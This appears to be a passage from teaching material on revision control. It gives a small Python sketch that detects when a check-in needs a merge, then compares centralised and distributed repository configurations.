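The ‘first check-in succeeds, later check-ins must merge’ rule can be modelled by having each check-in state which revision it was based on. This is a minimal Python sketch with hypothetical names (`MergingRepository`, `MergeRequired`); it only detects that a merge is needed and leaves the merge itself to the developer.

```python
class MergeRequired(Exception):
    """Raised when a check-in is based on an out-of-date revision."""


class MergingRepository:
    def __init__(self, contents):
        self.revisions = [contents]  # index in the list = revision number

    def check_out(self):
        """Return (revision number, contents) of the current tip; no lock taken."""
        return len(self.revisions) - 1, self.revisions[-1]

    def check_in(self, base_revision, contents):
        """Accept the change only if it was made against the current tip."""
        tip = len(self.revisions) - 1
        if base_revision != tip:
            raise MergeRequired(f"based on r{base_revision}, but tip is r{tip}")
        self.revisions.append(contents)
        return len(self.revisions) - 1
```

If two developers both check out revision 0, the first `check_in(0, ...)` creates revision 1; the second is rejected with `MergeRequired` and must check out revision 1, merge their changes into it, and check in against that.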


Revision Control System Configurations

Revision control systems are designed to allow multiple users to access and modify artefacts from any location, either locally or across a network. There are two basic configurations of RCS – centralised and distributed. Each has its own merits; and the choice of RCS depends on the type of project being developed.

Centralised database systems

In a centralised system there is one master reference copy of all artefacts (Figure 6). Clients access the artefacts by making copies of a subset of the central archive. This subset is a ‘view’ on the repository known as a Workspace. The workspace acts as an additional form of access control. The client is free to modify any artefact within their workspace, but may not modify anything not in their workspace (in fact, it should not be visible to them). Workspaces allow CM Managers to restrict access of staff to only the artefacts that are relevant to them.

image

Figure 6 – In a centralised system clients view a subset of the central repository

Centralised systems are best suited to geographically-close, commercial development projects, keeping all the company’s artefacts (which comprise their intellectual property) in a central location (for ease of back-up, etc.).

Distributed database systems

In a distributed system each client’s workspace is a bona fide repository. Each client has a full copy of the archive, complete with all revisions (Figure 7). The client is free to modify the database as they see fit.

image

Figure 7 – Multiple versions of the archive exist in a distributed system

Copies of the archives are kept synchronised with periodic updates (known as patches) sent between each of the RCSs.

Distributed database systems are widely used for open source software development. They are well suited to developments that may be geographically distant and are being modified according to widely differing requirements.
